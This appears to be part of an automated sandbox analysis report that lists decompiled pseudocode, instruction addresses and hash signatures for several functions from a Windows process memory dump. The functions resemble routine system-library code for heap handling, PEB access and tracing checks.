0x0101bc42
0x0101bc45
0x0101bc4a
0x0101bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0101bc50
0x0101bc50
0x0101bc58
0x0101bc5a
0x0101bc60
0x00000000
0x00000000
0x0105a4f2
0x0105a4f6
0x00000000
0x00000000
0x00000000
0x0105a4fc
0x0101bc79
0x0101bc7e
0x0101bc86
0x0101bd16
0x0101bd20
0x0101bd20
0x0101bc8d
0x0101bc94
0x0101bcbd
0x0101bcca
0x0101bccb
0x0101bccc
0x0101bccd
0x0101bcce
0x0101bcd4
0x0101bcea
0x0101bcee
0x0101bcf2
0x0101bd00
0x0101bd04
0x00000000
0x0101bc96
0x0101bcab
0x0101bcaf
0x0101bd2c
0x0101bd2c
0x0101bd09
0x00000000
0x0101bd09
0x0101bcb1
0x0101bcb5
0x0101bcbb
0x00000000
0x00000000
0x00000000
0x0101bcbb

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8073c7219a20e40c80bccd5fec46a64343046bcf4d2b3db4c42a0e9d4661327
Instruction ID: 999d4bf39628df261a88da7340761d2a6f484b97a352721d3d05bcbe60c53f70
Opcode Fuzzy Hash: f8073c7219a20e40c80bccd5fec46a64343046bcf4d2b3db4c42a0e9d4661327
Instruction Fuzzy Hash: 463136366016069FCB61EF98C4807A677B4FF18310F4400B4EDC4DB209EB7AD945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01011DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01011DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0100F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01004620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0100F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01011dc2
0x01011dc5
0x01011dc7
0x01011dcc
0x01011dce
0x01011dd6
0x01011ddf
0x01011de0
0x01011de1
0x01011de5
0x01011de8
0x01011def
0x01011df0
0x01011df6
0x01011df7
0x01011dfe
0x01011e1a
0x00000000
0x00000000
0x01011e0b
0x01011e12
0x01011e12
0x01011e00
0x01011e00
0x01011e05
0x01011e1e
0x01011e23
0x0105570f
0x01055713
0x00000000
0x00000000
0x01055719
0x01055719
0x01011e2c
0x01011e2d
0x01011e2e
0x01011e2f
0x01011e31
0x01011e32
0x01011e35
0x01011e3d
0x01055723
0x0105573d
0x0105573d
0x00000000
0x01055723
0x01011e49
0x01011e4e
0x01011e4e
0x01011e09
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 4e77acde7242ef153d09efd109973bc938e63eabe76aa94a38496db8669a26e1
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 73217F72600119FBD725CFA9CC80EABBBFDEF89780F154195FA8597250D678AE01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FE9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x10bf6e8);
				E0103D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E010B88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0103D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x10d86c0; // 0xb807b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x10d86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01002280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E010B88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0102AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x10db1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x10d84c0;
										if(_t69 >=  *0x10d84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E010B9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00FE922A(_t82);
							_t53 = E01007D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E010B8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x10d86c0; // 0xb807b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x10d86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x10d86bc;
										_t72 = 0x10d86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00FE9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x10d86c4;
									_t72 = 0x10d86c0;
									L18:
									E01019B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x00fe9100
0x00fe9100
0x00fe9100
0x00fe9100
0x00fe9102
0x00fe9107
0x00fe910c
0x00fe9110
0x00fe9115
0x00fe9136
0x00fe9143
0x010437e4
0x010437e4
0x00fe9149
0x00fe914e
0x00fe914e
0x00fe9117
0x00fe911d
0x00000000
0x00000000
0x00fe911f
0x00fe9125
0x00000000
0x00fe9151
0x00fe9158
0x00fe915d
0x00fe9161
0x00fe9168
0x01043715
0x00000000
0x00fe916e
0x00fe916e
0x00fe9175
0x00fe9177
0x00fe917e
0x00fe917f
0x00fe9182
0x00fe9182
0x00fe9187
0x00fe9187
0x00fe918a
0x00fe918d
0x00fe918f
0x00fe9192
0x00fe9195
0x00fe9198
0x00fe9198
0x00fe9198
0x00fe919a
0x00000000
0x00000000
0x0104371f
0x01043721
0x01043727
0x0104372f
0x01043733
0x01043735
0x01043738
0x0104373b
0x0104373d
0x01043740
0x00000000
0x00000000
0x01043746
0x01043749
0x00000000
0x00000000
0x0104374f
0x01043751
0x00000000
0x00000000
0x01043757
0x01043759
0x0104375c
0x0104375c
0x0104375e
0x0104375e
0x01043761
0x01043764
0x00000000
0x00000000
0x01043766
0x01043768
0x010437a3
0x010437a3
0x010437a5
0x010437a7
0x010437ad
0x010437b0
0x010437b2
0x010437bc
0x010437c2
0x010437c2
0x010437b2
0x00fe9187
0x00fe9187
0x00fe918a
0x00fe918d
0x00fe918f
0x00fe9192
0x00fe9195
0x00000000
0x00fe9195
0x00000000
0x00fe9187
0x0104376a
0x0104376a
0x0104376c
0x0104376c
0x0104376f
0x01043775
0x00000000
0x00000000
0x01043777
0x01043779
0x00000000
0x00000000
0x01043782
0x01043787
0x01043789
0x01043790
0x01043790
0x0104378b
0x0104378b
0x0104378b
0x01043792
0x01043795
0x01043795
0x01043798
0x01043798
0x0104379b
0x0104379b
0x00fe91a3
0x00fe91a9
0x00fe91b0
0x00fe91b4
0x00fe91b4
0x00fe91bb
0x00fe91c0
0x00fe91c5
0x00fe91c7
0x010437da
0x00fe91cd
0x00fe91cd
0x00fe91cd
0x00fe91d2
0x00fe91d5
0x00fe9239
0x00fe9239
0x00fe91d7
0x00fe91db
0x00fe91e1
0x00fe91e7
0x00fe91fd
0x00fe9203
0x00fe921e
0x00fe9223
0x00000000
0x00fe9223
0x00fe9205
0x00fe9208
0x00fe920c
0x00fe9214
0x00fe9214
0x00fe91e9
0x00fe91e9
0x00fe91ee
0x00fe91f3
0x00fe91f3
0x00fe91f3
0x00fe91e7
0x00000000
0x00fe91db
0x00fe9187
0x00fe9168

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73501dff25212a2a4f6b19111affb3a65ce4fa784cbfc3885b872af6763df352
Instruction ID: 0b503e9481414e24a099ee21be2601029d10e59c009f9ce7c14cd415f82521a9
Opcode Fuzzy Hash: 73501dff25212a2a4f6b19111affb3a65ce4fa784cbfc3885b872af6763df352
Instruction Fuzzy Hash: AB310675E092C6DFDB21DF6AC488BDCBBF1BB58360F24815AC48467251C3B8A980DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01000050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E01000050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x10dd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01019ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0102B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E010B8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01019702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x10db1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x01000055
0x0100005d
0x01000062
0x0100006c
0x0100006f
0x01000074
0x0100007a
0x0100007a
0x01000080
0x01000080
0x01000087
0x0100008d
0x0100008f
0x01000093
0x01000095
0x0100009b
0x010000f8
0x010000fb
0x010000fc
0x010000ff
0x01000108
0x01000108
0x010000a2
0x010000a6
0x010000b3
0x010000bc
0x010000c5
0x010000ca
0x0104c01e
0x00000000
0x00000000
0x0104c02d
0x010000d5
0x010000d9
0x0104c03d
0x0104c046
0x0104c046
0x010000df
0x010000e2
0x010000ea
0x010000ef
0x010000f2
0x010000f6
0x01000111
0x01000117
0x01000117
0x00000000
0x010000f6
0x010000d0
0x010000d0
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412852cbc92a099c002dc26df0ae9a0072c7e9a597c1568a5171512d5d89a40d
Instruction ID: 212826dd4dc4c77e1ee6c9a28cdff24941c49ad306a5a77f0aa7fbf32237ff24
Opcode Fuzzy Hash: 412852cbc92a099c002dc26df0ae9a0072c7e9a597c1568a5171512d5d89a40d
Instruction Fuzzy Hash: 9631BF31201B05CFE762CF28C840B9AB7E5FF89754F1485ADF5D687A94EB35A801CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01066C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01066C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01007D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x10d7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01004620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0102F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01007D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01029AE0();
						_t23 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01066c0a
0x01066c0f
0x01066c10
0x01066c13
0x01066c15
0x01066c19
0x01066c1c
0x01066c21
0x01066c28
0x01066c3a
0x01066c2a
0x01066c33
0x01066c33
0x01066c3f
0x01066c48
0x01066c4d
0x01066c60
0x01066c65
0x01066c69
0x01066c73
0x01066c79
0x01066c7f
0x01066c86
0x01066c90
0x01066c94
0x01066ca6
0x01066cb2
0x01066cbd
0x01066cbd
0x01066cc3
0x01066cc7
0x01066ccb
0x01066cd0
0x01066cd1
0x01066ce2
0x01066ce2
0x01066c69
0x01066ced

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55544ebfcbbef7804f5b8a1f0f0dec431d037333ea1313562b4b73a2693f0444
Instruction ID: 749b24c612b3efe900e80037cfa1d97f10e25a0aba8fd16983dc77fbbbe67d59
Opcode Fuzzy Hash: 55544ebfcbbef7804f5b8a1f0f0dec431d037333ea1313562b4b73a2693f0444
Instruction Fuzzy Hash: 7E21AD71A00A55AFD711DB68D840F6AB7B8FF48750F0440AAF988D7791D639ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010290AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010290AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0103D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0101E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01004620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0102F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0101A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x010290af
0x010290b8
0x010290bb
0x010290bf
0x010290c2
0x010290c2
0x010290c8
0x010290cb
0x010290cd
0x010614d7
0x010614eb
0x010614eb
0x00000000
0x010614eb
0x010614db
0x010614e6
0x00000000
0x010614f2
0x010614e8
0x00000000
0x010614e8
0x010290d8
0x010290da
0x010290dd
0x010290e5
0x00000000
0x01029139
0x010290fa
0x010290fe
0x01029142
0x00000000
0x01029142
0x01029104
0x01029107
0x0102910b
0x01029110
0x01029118
0x01029147
0x01029148
0x0102914f
0x01029150
0x01029151
0x01029152
0x01029156
0x0102915d
0x01029160
0x01029168
0x0102916c
0x010291bc
0x010291be
0x00000000
0x010291be
0x0102916e
0x01029173
0x01029176
0x00000000
0x00000000
0x0102917c
0x01029180
0x010291b5
0x00000000
0x010291b5
0x01029182
0x01029185
0x01029189
0x00000000
0x00000000
0x0102918e
0x01029190
0x01029198
0x00000000
0x00000000
0x010291a0
0x00000000
0x010291ad
0x010291ad
0x010291b0
0x010291b1
0x00000000
0x01029185
0x0102911a
0x0102911c
0x0102911f
0x01029125
0x01029127
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: f4cd4b8540169b2fe0eff5e3650ca703866479354e0424c57c72f7d76a0ef6af
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: A6219F71A00325EFDB21DF59C844EAAFBF8EF54354F1488AAE989A7200D730ED00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01013B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01013B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x10d84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x10d84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10d84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0102AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0102FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10d84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x10d84c4; // 0x0
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01013b89
0x01013b96
0x01013ba1
0x01013bab
0x01013bb5
0x01013bb9
0x01056298
0x01013bbf
0x01013bc2
0x01013bc3
0x01013bc9
0x01013bca
0x01013bcc
0x01013bcd
0x01013bd4
0x01013bd6
0x01013bdb
0x01013bea
0x01013bf7
0x01013bfb
0x01013bff
0x01013c09
0x01013c0a
0x01013c0b
0x01013c0f
0x01013c14
0x01013c18
0x01013c18
0x01013bfb
0x01013c1b
0x01013c30
0x01013c30
0x01013c3d

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f8bfba75d5d165dd6a1a72e47b0a7d57b5671a23ecd497ea81952368bedebc2
Instruction ID: 746281886faf3aa763723254205a8f9f3c6d8d4a0ca24ebd2a0c7dd7b0f96587
Opcode Fuzzy Hash: 9f8bfba75d5d165dd6a1a72e47b0a7d57b5671a23ecd497ea81952368bedebc2
Instruction Fuzzy Hash: CF21FF72A01109EFC700DF58CD81F9ABBBDFB40358F150069EA48AB252D776ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01066CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01066CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01007D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01007D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xfc5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0101F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0101F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01067016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01002400( &_v52);
								}
								_t21 = L01002400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01066cfb
0x01066d00
0x01066d02
0x01066d06
0x01066d0a
0x01066d0e
0x01066d19
0x01066d2b
0x01066d1b
0x01066d24
0x01066d24
0x01066d33
0x01066d39
0x01066d46
0x01066d4f
0x01066d61
0x01066d51
0x01066d5a
0x01066d5a
0x01066d69
0x01066d6b
0x01066d6d
0x01066d6f
0x01066d6f
0x01066d74
0x01066d79
0x01066d7a
0x01066d7f
0x01066d82
0x01066d88
0x01066d89
0x01066d90
0x01066d94
0x01066da7
0x01066db1
0x01066db1
0x01066dbb
0x01066dbb
0x01066d90
0x01066d69
0x01066d46
0x01066dc6

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3696e8e6602e06fe5ffff2d4750e86cf469c608390f0038e50a0c75ef65a41b3
Instruction ID: 5286f0cf0b4f3b59a50ae35ccb70074cc0e443a41e1d888f83d31e31c6dc9e3d
Opcode Fuzzy Hash: 3696e8e6602e06fe5ffff2d4750e86cf469c608390f0038e50a0c75ef65a41b3
Instruction Fuzzy Hash: E221F8729007459BD311EF29C944B9BBBECAFA1740F040496FAC0C7291D735D548C6A2

Uniqueness

